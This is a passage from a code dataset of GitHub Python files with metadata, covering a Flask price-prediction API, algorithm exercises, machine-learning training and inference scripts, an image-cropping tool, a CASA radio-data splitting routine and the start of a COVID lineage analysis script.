244, \n 'Varanasi': 245, 'Vellore': 246, 'Vidisha': 247, 'Vijayawada': 248, 'Visakhapatnam': 249, \n 'Visnagar': 250, 'Vizianagaram': 251, 'Warangal': 252, 'Wardha': 253, 'Washim': 254, \n 'Yavatmal': 255}\n@app.route('/api',methods=['POST'])\n@cross_origin()\ndef predict():\n data = request.get_json(force=True)\n val= [data[\"UNDER_CONSTRUCTION\"],data[\"BHK_NO.\"],data[\"SQUARE_FT\"],warehouse[data[\"City\"]]]\n val = [val]\n prediction = model.predict(pd.DataFrame(val,columns=['UNDER_CONSTRUCTION','BHK_NO.','SQUARE_FT','City']))\n print(prediction)\n output = prediction[0][0]\n if str(output) < '0':\n output='233'\n\n # output='hello'\n return jsonify(output)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)","repo_name":"realvineeths/FlatHUB","sub_path":"serverflask/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74625166273","text":"def jewel_and_stones(jewels: str, stones: str)-> int:\n \"\"\"\n Given a string representing your stones and another string representing a list of jewels, \n return the number of stones that you have that are also jewels. 
\n\n Example: Given the following jewels and stones...\n\n jewels = \"abc\", stones = \"ac\", return 2\n jewels = \"Af\", stones = \"AaaddfFf\", return 3\n jewels = \"AYOPD\", stones = \"ayopd\", return 0 \n \"\"\"\n count = 0\n for s in stones:\n if s in jewels:\n count += 1\n return count\n\nif __name__ == \"__main__\":\n vals = [[\"abc\", \"ac\"], [\"Af\", \"AaaddfFf\"], [\"AYOPD\", \"ayopd\"]]\n\n for val in vals:\n print(jewel_and_stones(jewels=val[0], stones=val[1]))\n","repo_name":"Brian-Munene/DSA-challenges","sub_path":"jewel_and_stones.py","file_name":"jewel_and_stones.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36996763325","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n if not grid or not grid[0]:\n return 0\n\n m, n = len(grid), len(grid[0])\n count = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j] == '1':\n self.dfs(grid, i, j)\n count += 1\n return count\n \n def is_valid(self, grid, r, c):\n m, n = len(grid), len(grid[0])\n if r < 0 or c < 0 or r >= m or c >= n:\n return False\n return True\n\n def dfs(self, grid, r, c):\n grid[r][c] = '0'\n directions = [(0,1), (0,-1), (-1,0), (1,0)]\n for d in directions:\n nr, nc = r + d[0], c + d[1] \n if self.is_valid(grid, nr, nc) and grid[nr][nc] == '1':\n self.dfs(grid, nr, nc)","repo_name":"algorithm006-class02/algorithm006-class02","sub_path":"Week_03/G20200389010036/LeetCode_200_036.py","file_name":"LeetCode_200_036.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"18550524044","text":"import re\n\ndef calc_day06():\n with open(\"day06.txt\") as day06:\n lines = day06.read()\n\n answergroups = lines.split(\"\\n\\n\")\n\n part1 = 0\n part2 = 0\n\n groupanswers_or = set()\n for answergroup in answergroups:\n answers = answergroup.split()\n groupanswers_or.clear()\n groupanswers_and = set(list(answers[0]))\n for answer in answers:\n groupanswers_or |= set(list(answer))\n groupanswers_and &= set(list(answer))\n part1 += len(groupanswers_or)\n part2 += len(groupanswers_and)\n\n return part1, part2\n\nif __name__ == \"__main__\":\n part1, part2 = calc_day06()\n print(part1) # 6291\n print(part2) # 3052\n\n # python -m timeit -n 100 -s \"from day06 import calc_day06\" \"calc_day06()\"\n\n # baseline:\n # 100 loops, best of 5: 6.47 msec per loop\n\n # optimization 1: use the first answer instead of the alphabet for part 2\n # 100 loops, best of 5: 6.58 msec per loop\n\n # opt. 
2: clearing the set instead of creating a new one for every group\n    # 100 loops, best of 5: 6.48 msec per loop\n\n","repo_name":"Lewistrick/adventofcode2020","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37984095542","text":"from __future__ import division # floating point division\nimport csv\nimport random\nimport math\nimport numpy as np\n\nimport dataloader as dtl\nimport classalgorithms as algs\n\n\ndef getaccuracy(ytest, predictions):\n    correct = 0\n    for i in range(len(ytest)):\n        if ytest[i] == predictions[i]:\n            correct += 1\n    return (correct/float(len(ytest))) * 100.0\n\ndef geterror(ytest, predictions):\n    return (100.0-getaccuracy(ytest, predictions))\n\n## k-fold cross-validation\n# K - number of folds\n# X - data to partition\n# Y - targets to partition\n# classalgs - a dictionary mapping algorithm names to algorithm instances\n#\n# example:\nclassalgs = {\n    'Logistic Regression': algs.LogitReg(),\n    'Neural Network': algs.NeuralNet({'epochs': 100})\n}\n\nparameters = (\n    #{'regwgt': 0.0, 'nh': 4},\n    {'regwgt': 0.01, 'nh': 8},\n    {'regwgt': 0.05, 'nh': 16},\n    {'regwgt': 0.1, 'nh': 32},\n    )\n\n\ndef cross_validate(K, X, Y, classalgs):\n    errors = {}\n    numparams = len(parameters)\n\n    # one row of errors per parameter setting, one column per fold\n    for learnername in classalgs:\n        errors[learnername] = np.zeros((numparams, K))\n\n    # integer fold size so the slicing below stays valid\n    set_len = len(X) // K\n\n    for k in range(K):\n        for p in range(numparams):\n            params = parameters[p]\n\n            for learnername,learner in classalgs.items():\n                start = k*set_len\n                Xtest_set = X[start:start+set_len]\n                Ytest_set = Y[start:start+set_len]\n                Xtrain_set = np.concatenate((X[0:start],X[start+set_len:len(X)]),axis=0)\n                Ytrain_set = np.concatenate((Y[0:start],Y[start+set_len:len(Y)]),axis=0)\n\n                # Reset learner for new parameters\n                learner.reset(params)\n                print ('Running learner = ' + learnername + ' on parameters ' + str(learner.getparams()))\n                # Train model\n                learner.learn(Xtrain_set, Ytrain_set)\n                # Test model\n                predictions = learner.predict(Xtest_set)\n                error = geterror(Ytest_set, predictions)\n                print ('Error for ' + learnername + ': ' + str(error))\n                errors[learnername][p, k] = error\n\n    # pick the learner/parameter combination with the lowest error averaged over folds\n    best_algorithm = None\n    best_overall_error = None\n    for learnername, learner in classalgs.items():\n        besterror = np.mean(errors[learnername][0, :])\n        bestparams = 0\n        for p in range(numparams):\n            aveerror = np.mean(errors[learnername][p, :])\n            if aveerror < besterror:\n                besterror = aveerror\n                bestparams = p\n        if best_overall_error is None or besterror < best_overall_error:\n            best_overall_error = besterror\n            learner.reset(parameters[bestparams])\n            best_algorithm = learner\n    return best_algorithm\n\n\nif __name__ == '__main__':\n\n    trainsize = 5000\n    testsize = 5000\n    numruns = 10\n\n    classalgs = {\n        'Random': algs.Classifier(),\n        'Naive Bayes': algs.NaiveBayes({'usecolumnones': False}),\n        'Naive Bayes Ones': algs.NaiveBayes({'usecolumnones': True}),\n        'Linear Regression': algs.LinearRegressionClass(),\n        'Logistic Regression': algs.LogitReg(),\n        'Neural Network': algs.NeuralNet({'epochs': 100}),\n        'LinearKernelLogitReg':algs.KernelLogitReg({'kernel':'linear','regwgt': 0.01, 'regularizer': 'None'}),\n        'HammingKernelLogitReg': algs.KernelLogitReg({'kernel': 'hamming', 'regwgt': 0.01, 'regularizer': 'None'})\n    }\n    numalgs = len(classalgs)\n\n    parameters = (\n        #{'regwgt': 0.0, 'nh': 4},\n        {'regwgt': 0.01, 'nh': 8},\n        {'regwgt': 0.05, 'nh': 16},\n        {'regwgt': 0.1, 'nh': 32},\n        )\n    numparams = len(parameters)\n\n    errors = {}\n    for learnername in classalgs:\n        errors[learnername] = np.zeros((numparams,numruns))\n\n    for r in range(numruns):\n        '''\n        To run hamming distance kernel, please 
comment out line 75 and uncomment line 77\n        '''\n        trainset, testset = dtl.load_susy(trainsize,testsize)\n        #trainset, testset = dtl.load_susy_complete(trainsize,testsize)\n        #trainset, testset = dtl.load_census(trainsize,testsize)\n\n        print(('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r))\n\n        for p in range(numparams):\n            params = parameters[p]\n            for learnername, learner in classalgs.items():\n                # Reset learner for new parameters\n                learner.reset(params)\n                print ('Running learner = ' + learnername + ' on parameters ' + str(learner.getparams()))\n                # Train model\n                learner.learn(trainset[0], trainset[1])\n                # Test model\n                predictions = learner.predict(testset[0])\n                error = geterror(testset[1], predictions)\n                print ('Error for ' + learnername + ': ' + str(error))\n                errors[learnername][p,r] = error\n\n    for learnername, learner in classalgs.items():\n        besterror = np.mean(errors[learnername][0,:])\n        bestparams = 0\n        for p in range(numparams):\n            aveerror = np.mean(errors[learnername][p,:])\n            if aveerror < besterror:\n                besterror = aveerror\n                bestparams = p\n\n        # Extract best parameters\n        learner.reset(parameters[bestparams])\n        print ('Best parameters for ' + learnername + ': ' + str(learner.getparams()))\n        print ('Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(np.std(errors[learnername][bestparams,:])/math.sqrt(numruns)))\n","repo_name":"wooloba/Classifiers","sub_path":"script_classify.py","file_name":"script_classify.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31766235800","text":"import random\nimport time\n\ndef test_data_ordered(n):\n    return [i for i in range(n)]\n\ndef test_data_random(n):\n    return [random.randint(0,1000) for _ in range(n)]\n\ndef check_sorted(alist):\n    \"\"\"Checks whether the sequence is sorted\"\"\"\n    return all(alist[i] <= alist[i+1] for i in range(len(alist)-1))\n\nprint(test_data_ordered(10))\nprint(test_data_random(10))\n\ndef split(alist,l,r):\n    pindex = (l+r)//2\n    l0 = l\n    r0 = r\n    pivot = alist[pindex]\n    print(\"Pivot: {}\".format(pivot))\n    # Swap elements so that the first part holds\n    # elements smaller than the pivot and the second part elements greater than or equal to it\n\n    #l = 0\n    #r = len(alist)-1\n\n    l -= 1\n    r += 1\n\n    while True:\n        # start:\n        # move l to the right while alist[l] < pivot\n        l += 1\n        while alist[l] < pivot:\n            l += 1\n        # move r to the left while alist[r] > pivot\n        r -= 1\n        while alist[r] > pivot:\n            r -= 1\n        #if r<l and alist[l] >= pivot:\n        #    alist[pindex] = alist[l]\n        #    alist[l] = pivot\n\n        # check whether l and r have crossed\n        print(\"l: {}, r: {}\".format(l,r))\n        if l >= r:\n            # if so, we are done\n            break\n        else:\n            # if not, swap and continue again from the start\n            tmp = alist[l]\n            alist[l] = alist[r]\n            alist[r] = tmp\n\n    # Returns the pivot index after the swapping\n    return l-1\n\ndef split2(alist,l,r):\n    #print(\"l: {}, r: {}\".format(l,r))\n    pindex = (l+r)//2\n    pivot = alist[pindex]\n    #print(\"Pivot: {}\".format(pivot))\n    # standard Hoare-style partition; the inner loops below were reconstructed where the\n    # comparison operators had been lost during text extraction\n    while (l<=r):\n        while (alist[l]<pivot):\n            l+=1\n        while (alist[r]>pivot):\n            r-=1\n        if l<=r:\n            if alist[l]>alist[r]:\n                tmp = alist[l]\n                alist[l] = alist[r]\n                alist[r] = tmp\n            l+=1\n            r-=1\n    # return the crossed pointers; the caller unpacks them as (midl, midr)\n    return (l,r)\n\ndef qs(alist,l,r):\n    if r-l <= 1:\n        # order a remaining pair directly before returning\n        if r > l and alist[l] > alist[r]:\n            alist[l], alist[r] = alist[r], alist[l]\n        return\n    # split the list into a part smaller than the pivot, the pivot, and a part >= the pivot\n    #print(\"List pre: {}\".format(alist[l:r+1]))\n    (midl,midr) = split2(alist,l,r)\n    #print(\"List post: {}\".format(alist[l:r+1]))\n    #print(\"L: {}, R: {}, midl: {}, midr: {}\".format(l,r,midl,midr))\n    # recurse on the left part\n    qs(alist,l,midr)\n    # recurse on the right part\n    qs(alist,midl,r)\n\ndef quick_sort(alist):\n    qs(alist,0,len(alist)-1)\n\nalist = [1,2,3,4,5]\nquick_sort(alist)\nprint(\"Result: {}\".format(alist))\nprint()\nalist = [5,4,3,2,1]\nquick_sort(alist)\nprint(\"Result: {}\".format(alist))\nprint()\nalist = [1,1,1,1,1]\nquick_sort(alist)\nprint(\"Result: {}\".format(alist))\nprint()\nalist = [1,4,1,2,8]\nquick_sort(alist)\nprint(\"Result: {}\".format(alist))\n\n\nalist = test_data_random(10)\nquick_sort(alist)\nprint(\"The result is {} and it is: {}\".format(alist == sorted(alist),alist))\n\nfor _ in range(1000):\n    alist = test_data_random(1000)\n    quick_sort(alist)\n    if alist != sorted(alist):\n        print(\"Sorted wrong!\")\n        exit(1)\n\n\ndef select_sort(alist):\n    \"\"\"Returns a sorted list\"\"\"\n    for i in range(len(alist)):\n        minindex = -1\n        minval = 100000000\n        for j in range(i,len(alist)):\n            if minval > alist[j]:\n                minindex = j\n                minval = alist[j]\n        tmp = alist[i]\n        alist[i] = alist[minindex]\n        alist[minindex] = tmp\n\ndata = test_data_random(10000)\nstart = time.time()\nselect_sort(data)\nend = time.time()\n#print(data)\n\nprint(\"It took {:.3} s\".format(end-start))\n\n","repo_name":"xtompok/prg2","sub_path":"sort/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20059880350","text":"# -*- coding: utf-8 -*-\n'''\n    Author : Huseyin BIYIK \n    Year : 2017\n    License : GPL\n\n    This program is free software: you can redistribute it and/or modify\n    it under the terms of the GNU General Public License as published by\n    the Free Software Foundation, either version 3 of the License, or\n    (at your option) any later version.\n\n    This program is distributed in the hope that it will be useful,\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n    GNU General Public License for more details.\n\n    You should have received a copy of the GNU General Public License\n    along with this program. If not, see <http://www.gnu.org/licenses/>.\n'''\nfrom PySide import QtGui\n\nfrom libpyscl import log\nfrom lxml.etree import QName\n\n\nclass NODES(object):\n    def __init__(self, tree, scl):\n        self.__tree = tree\n        self.scl = scl\n\n    def build(self):\n        self.__tree.clear()\n\n        def loop(base, root):\n            for node in root:\n                name = QName(node.tag)\n                display = name.localname\n                values = node.values()\n                if values:\n                    display += \"[%s]\" % \":\".join(values)\n                treeitem = QtGui.QTreeWidgetItem(base, [display])\n                if node.getchildren():\n                    loop(treeitem, node)\n\n        loop(self.__tree, self.scl.scl.getroot())\n","repo_name":"hbiyik/easyscl","sub_path":"src/libpyscl/elements/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71307780353","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom io import open\nimport pickle\n\nclass PersonFiles:\n\n    # Class constructor\n    def __init__(self, name, personId, hairColor=\" \", glasses=\" \", gender=\" \", age=0):\n        self.name = name\n        self.personId = personId\n        self.hairColor = hairColor\n        self.glasses = glasses\n        self.gender = gender\n        self.age = age\n        print('The person {} has been saved in file personsGroup.pckl'.format(self.name))\n\n    def __str__(self):\n        return '{} has {} hair, {}, is approximately {} years old and is {}'.format(\n            self.name, self.hairColor, self.glasses, self.age, self.gender)\n\nclass Group:\n\n    persons = []\n    temp = []\n\n    # Class constructor\n    def __init__(self):\n        self.load()\n\n    def add(self,p):\n        self.persons.append(p)\n        self.save()\n\n    def show(self):\n        if len(self.persons) == 0:\n            print(\"The group is empty in edit_files\")\n            return\n        \n        for p in self.persons:\n            print(p)\n\n    def load(self):\n        file = open('personsGroup.pckl', 'ab+')\n        file.seek(0)\n        try:\n            self.persons = pickle.load(file)\n        except:\n            print(\"The File is Empty in edit_files\")\n        finally:\n            file.close()\n        print(\"{} persons loaded in edit_files\".format(len(self.persons)))\n    \n    def delete(self,name):\n        self.load()\n        temp = []\n        flag = False\n        if len(self.persons) == 0:\n            print(\"The group is empty in edit_files\")\n            return\n        for person in self.persons:\n            if person.name != name:\n                temp.append(person)\n            else:\n                flag = True\n                print(\"{} deleted in editfiles\".format(name))\n        if not flag:\n            print(\"{} is not in group in editfiles\".format(name))\n        self.persons = temp\n        self.save()\n    \n    def save(self):\n        file = open('personsGroup.pckl', 'wb')\n        pickle.dump(self.persons, file)\n        file.close()\n","repo_name":"carlosquinterop/SinfoniaPepperTeam","sub_path":"sinfonia_pepper_tools_interaction/scripts/Class/edit_files.py","file_name":"edit_files.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"25487401891","text":"from argparse import ArgumentParser\n\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom models.ViT import ViT\n\nmnist_classes = [str(ii) for ii in range(10)]\nfruit_classes = ['Apple Braeburn', 'Apple Crimson Snow', 'Apple Golden 1', 'Apple Golden 2', 'Apple Golden 3',\n                 'Apple Granny Smith', 'Apple Pink Lady', 'Apple Red 1', 'Apple Red 2', 'Apple Red 3',\n                 'Apple Red Delicious', 'Apple Red Yellow 1', 'Apple Red Yellow 2', 'Apricot', 'Avocado ripe',\n                 'Avocado', 'Banana Lady Finger', 'Banana Red', 'Banana', 'Beetroot', 'Blueberry', 'Cactus fruit',\n                 'Cantaloupe 1', 'Cantaloupe 2', 'Carambula', 'Cauliflower', 'Cherry 1', 
'Cherry 2', 'Cherry Rainier',\n 'Cherry Wax Black', 'Cherry Wax Red', 'Cherry Wax Yellow', 'Chestnut', 'Clementine', 'Cocos',\n 'Corn Husk', 'Corn', 'Cucumber Ripe 2', 'Cucumber Ripe', 'Dates', 'Eggplant', 'Fig', 'Ginger Root',\n 'Granadilla', 'Grape Blue', 'Grape Pink', 'Grape White 2', 'Grape White 3', 'Grape White 4',\n 'Grape White', 'Grapefruit Pink', 'Grapefruit White', 'Guava', 'Hazelnut', 'Huckleberry', 'Kaki',\n 'Kiwi', 'Kohlrabi', 'Kumquats', 'Lemon Meyer', 'Lemon', 'Limes', 'Lychee', 'Mandarine', 'Mango Red',\n 'Mango', 'Mangostan', 'Maracuja', 'Melon Piel de Sapo', 'Mulberry', 'Nectarine Flat', 'Nectarine',\n 'Nut Forest', 'Nut Pecan', 'Onion Red Peeled', 'Onion Red', 'Onion White', 'Orange', 'Papaya',\n 'Passion Fruit', 'Peach 2', 'Peach Flat', 'Peach', 'Pear 2', 'Pear Abate', 'Pear Forelle',\n 'Pear Kaiser', 'Pear Monster', 'Pear Red', 'Pear Stone', 'Pear Williams', 'Pear', 'Pepino',\n 'Pepper Green', 'Pepper Orange', 'Pepper Red', 'Pepper Yellow', 'Physalis with Husk', 'Physalis',\n 'Pineapple Mini', 'Pineapple', 'Pitahaya Red', 'Plum 2']\n\n\ndef main():\n # root_path = ''\n\n parser = ArgumentParser()\n parser.add_argument('--dataset', type=str)\n parser.add_argument('--weights', type=str)\n parser.add_argument('--image-path', type=str)\n args = parser.parse_args()\n\n assert args.dataset in ['fruit', 'mnist']\n\n if args.dataset == 'mnist':\n model = ViT.load_from_checkpoint(\n args.weights,\n image_size=28,\n patch_size=7,\n num_channels=1,\n num_classes=len(mnist_classes),\n d_model=128,\n num_blocks=6,\n num_heads=8,\n mvp_head=512,\n dropout=0.1,\n displ_attention=True,\n )\n else:\n model = ViT.load_from_checkpoint(\n args.weights,\n image_size=100,\n patch_size=10,\n num_channels=3,\n num_classes=len(fruit_classes),\n d_model=128,\n num_blocks=6,\n num_heads=8,\n mvp_head=512,\n dropout=0.1,\n displ_attention=True,\n )\n\n image = Image.open(args.image_path)\n image_normalized = transforms.ToTensor()(image).unsqueeze(0)\n # print(f\"image shape: {image_normalized.size()}\")\n\n model.eval()\n logits = model(image_normalized)\n pred = torch.argmax(logits, dim=-1).item()\n\n pred_label = mnist_classes[pred] if args.dataset == 'mnist' else fruit_classes[pred]\n\n print(f\"Predicted label: {pred_label}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"homomorfism/vision-transformer-pytorch","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74989397954","text":"#批量裁剪至256*256\n\nimport torch.utils.data as data\nfrom glob import glob\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport argparse\nimport os\nimport imageio\nimport numpy as np\nimport pandas as pd\ndef get_all_path(open_file_path):\n rootdir = open_file_path\n path_list = []\n list = os.listdir(rootdir) # 列出文件夹下所有的目录与文件\n for i in range(0, len(list)):\n com_path = os.path.join(rootdir, list[i])\n #print(com_path)\n if os.path.isfile(com_path):\n path_list.append(com_path)\n if os.path.isdir(com_path):\n path_list.extend(get_all_path(com_path))\n #print(path_list)\n return path_list\n\n\nclass DataSet(data.Dataset):\n def __init__(self, img_dir, resize):\n super(DataSet, self).__init__()\n # self.img_paths = glob('{:s}/*'.format(img_dir))\n self.img_paths = get_all_path(img_dir)\n self.transform = transforms.Compose([\n transforms.Resize(int(resize * 76 / 64)),\n transforms.RandomCrop(resize),\n 
transforms.RandomHorizontalFlip()])\n self.data_dir = img_dir\n\n def load_bbox(self):\n data_dir = self.data_dir\n bbox_path = os.path.join(data_dir, '/Users/liailin/Downloads/DM-GAN/data/birds/CUB_200_2011/bounding_boxes.txt')\n df_bounding_boxes = pd.read_csv(bbox_path,\n delim_whitespace=True,\n header=None).astype(int)\n #\n filepath = os.path.join(data_dir, '/Users/liailin/Downloads/DM-GAN/data/birds/CUB_200_2011/images.txt')\n df_filenames = \\\n pd.read_csv(filepath, delim_whitespace=True, header=None)\n filenames = df_filenames[1].tolist()\n print('Total filenames: ', len(filenames), filenames[0])\n #\n filename_bbox = {img_file[:-4]: [] for img_file in filenames}\n numImgs = len(filenames)\n for i in range(0, numImgs):\n # bbox = [x-left, y-top, width, height]\n bbox = df_bounding_boxes.iloc[i][1:].tolist()\n\n key = filenames[i][:-4]\n filename_bbox[key] = bbox\n #\n return filename_bbox\n\n\n\n def __getitem__(self, item):\n\n img = Image.open(self.img_paths[item]).convert('RGB')\n if os.path.basename(self.data_dir)=='birdGT':\n width, height = img.size\n self.bbox = self.load_bbox()\n (filepath, tempfilename) = os.path.split(self.img_paths[item])\n (filepath1, tempfilename1) = os.path.split(filepath)\n key=tempfilename1+'/'+os.path.splitext(tempfilename)[0]\n bbox = self.bbox[key]\n r = int(np.maximum(bbox[2], bbox[3]) * 0.75)\n center_x = int((2 * bbox[0] + bbox[2]) / 2)\n center_y = int((2 * bbox[1] + bbox[3]) / 2)\n y1 = np.maximum(0, center_y - r)\n y2 = np.minimum(height, center_y + r)\n x1 = np.maximum(0, center_x - r)\n x2 = np.minimum(width, center_x + r)\n img = img.crop([x1, y1, x2, y2])\n\n img = self.transform(img)\n\n return img, self.img_paths[item]\n\n def __len__(self):\n return len(self.img_paths)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--img_dir', type=str, default='flowerGT')\n parser.add_argument('--resize', type=int, default=256)\n parser.add_argument('--save_dir', type=str, default='flowerGT256')\n args = parser.parse_args()\n\n if not os.path.exists(args.save_dir):\n os.mkdir(args.save_dir)\n dataset = DataSet(args.img_dir, args.resize)\n print('dataset:', len(dataset))\n\n for i in range(len(dataset)):\n img, path = dataset[i]\n path = os.path.basename(path)\n print('Processing:', path)\n\n imageio.imwrite(args.save_dir+'/{:s}'.format(path), img)\n\n\n\n\n","repo_name":"zjuirene/tools","sub_path":"crop_image256.py","file_name":"crop_image256.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"515930208","text":"import os\r\nimport time\r\nfrom keras.models import load_model\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport json\r\nimport datetime\r\n\r\nfpath = 'C:\\\\out'\r\n\r\nwhile True:\r\n # Get a list of all files in the folder\r\n files = os.listdir(fpath)\r\n file_count = len([f for f in os.listdir(fpath) if os.path.isfile(os.path.join(fpath, f))])\r\n\r\n if file_count >= 6:\r\n np.set_printoptions(suppress=True)\r\n model = load_model('./keras_model.h5', compile=False)\r\n # determined by the first position in the shape tuple, in this case 1\r\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n\r\n image = Image.open('C:\\\\out/5.bmp').convert(\"RGB\")\r\n\r\n size = (224, 224)\r\n image = ImageOps.fit(image, size, Image.Resampling.LANCZOS)\r\n\r\n image_array = np.asarray(image)\r\n\r\n normalized_image_array = (image_array.astype(np.float32) / 127.5) - 
1\r\n\r\n data[0] = normalized_image_array\r\n\r\n prediction = model.predict(data)\r\n index = np.argmax(prediction)\r\n confidence_score = prediction[0][index]\r\n\r\n if index == 0:\r\n z = {\r\n \"status\": True,\r\n }\r\n y = json.dumps(z)\r\n print(y)\r\n else:\r\n z = {\r\n \"status\": False,\r\n }\r\n y = json.dumps(z)\r\n print(y)\r\n\r\n # Loop through each file and delete it\r\n for file_name in files:\r\n # Construct the full file path by joining the folder path and file name\r\n file_path = os.path.join(fpath, file_name)\r\n # Check if the file is a file (not a directory)\r\n if os.path.isfile(file_path):\r\n # Delete the file\r\n os.remove(file_path)\r\n break\r\n else:\r\n time.sleep(3)","repo_name":"ajthdaniel24/Elephant-detection-and-alert-System","sub_path":"Classifications.py","file_name":"Classifications.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7607426433","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 14 13:08:20 2020\n\n@author: yogesh\n\"\"\"\nimport casatasks\nimport casatools\nimport os\nimport logging\nfrom modules import ugfunctions as ugf\nfrom datetime import datetime\nfrom os import sys\nimport numpy as np\nms=casatools.ms()\nmsmd=casatools.msmetadata()\n\n#############################################################\n# SPLIT step\n#############################################################\n\ndef split(msfilename,mytargets,workdir,dosplit,gainspw1,flagsplitfile):\n if dosplit == True:\n #\tassert os.path.isdir(msfilename), \"dosplit = True but ms file not found.\"\n try:\n assert os.path.isdir(msfilename), \"dosplit = True but ms file not found.\"\n except AssertionError:\n logging.info(\"dosplit = True but ms file not found.\")\n sys.exit()\n logging.info(\"The data on targets will be split into separate files.\")\n# casalog.filter('INFO')\n\n \n for i in range(0,len(mytargets)):\n if os.path.isdir(str(workdir)+mytargets[i]+'split.ms') == True:\n logging.info(\"The existing split file will be deleted.\")\n os.system('rm -rf '+str(workdir)+mytargets[i]+'split.ms')\n logging.info(\"Splitting target source data.\")\n logging.info(gainspw1)\n splitfilename = ugf.mysplitinit(msfilename,workdir,mytargets[i],gainspw1,1)\n#############################################################\n# Flagging on split file\n#############################################################\n if flagsplitfile == True:\n try:\n assert os.path.isdir(splitfilename), \"flagsplitfile = True but the split file not found.\"\n except AssertionError:\n logging.info(\"flagsplitfile = True but the split file not found.\")\n sys.exit()\n logging.info(\"Now proceeding to flag on the split file.\")\n myantselect =''\n ugf.mytfcrop(splitfilename,'',myantselect,8.0,8.0,'DATA','')\n a, b = ugf.getbllists(splitfilename)\n tdev = 6.0\n fdev = 6.0\n ugf.myrflag(splitfilename,'',a[0],tdev,fdev,'DATA','')\n tdev = 5.0\n fdev = 5.0\n ugf.myrflag(splitfilename,'',b[0],tdev,fdev,'DATA','')\n logging.info(\"A flagging summary is provided for the MS file.\")\n #os.system('aoflagger -indirect-read -strategy S20rfistr.rfis '+splitfilename)\n os.system('aoflagger -indirect-read '+splitfilename)\n casatasks.flagdata(vis=splitfilename,mode='extend',growtime=100,growfreq=40)\n # 
ugf.flagsummary(splitfilename)\n#############################################################","repo_name":"yogeshchandola/Spectral-CAPTURE","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761422644","text":"'''\nFrom sequence file, obtain all the pango lineages, and for each one,\nfind the mutation string that corresponds to the consensus sequence\nfor that lineage, and show the most commmon forms.\n'''\n## note, consensus is the most expensive part of the computation\n## use --consensusnever to avoid that computation\n\nfrom collections import Counter\nimport argparse\n\nimport verbose as v\nfrom hamming import hamming\n\nimport covid\nimport mutant\nimport commonforms as cf\n\ndef getargs():\n '''get arguments from command line'''\n ap = argparse.ArgumentParser(description=__doc__)\n paa = ap.add_argument\n covid.corona_args(ap)\n paa(\"--npatterns\",\"-n\",type=int,default=0,\n help=\"How many of the most common patterns per lineage (0=all)\")\n paa(\"--mincount\",\"-m\",type=int,default=10,\n help=\"Show only patters with at least this many counts\")\n paa(\"--consensusalways\",\"-c\",action=\"store_true\",\n help=\"Always show consensus, even if not common\")\n paa(\"--consensusnever\",action=\"store_true\",\n help=\"Do not compute consensus for each form [faster compute]\")\n paa(\"--protein\",default=\"Spike\",\n help=\"Protein name to be used in the header\")\n paa(\"--baseline\",default=\"XBB.1.5\",\n choices=tuple(covid.BASELINE_MSTRINGS),\n help=\"Use this sequence as basline for mutation strings\")\n paa(\"--bylineage\",action=\"store_true\",default=True,\n help=\"Partition sequences by pango lineage\")\n paa(\"--notbylineage\",action=\"store_false\",dest='bylineage',\n help=\"Do not partition sequences by pango lineges\")\n paa(\"--lineagebaseline\",action=\"store_true\",\n help=\"Use each lineage most common form as mstring baseline for that lineage\")\n paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n help=\"verbose\")\n args = ap.parse_args()\n if args.consensusalways and args.consensusnever:\n raise RuntimeError(\"Cannot have both --consensusalways and --consensusnever\")\n if args.baseline == 'Wuhan':\n args.baseline = None\n return args\n\ndef print_header(args):\n '''print the header before the table itself'''\n print(f\"COMMON FORMS OF {args.protein.upper()} \"\n f\"WITH A GIVEN PANGO LINEAGE DESIGNATION\")\n print()\n print(f\"For each 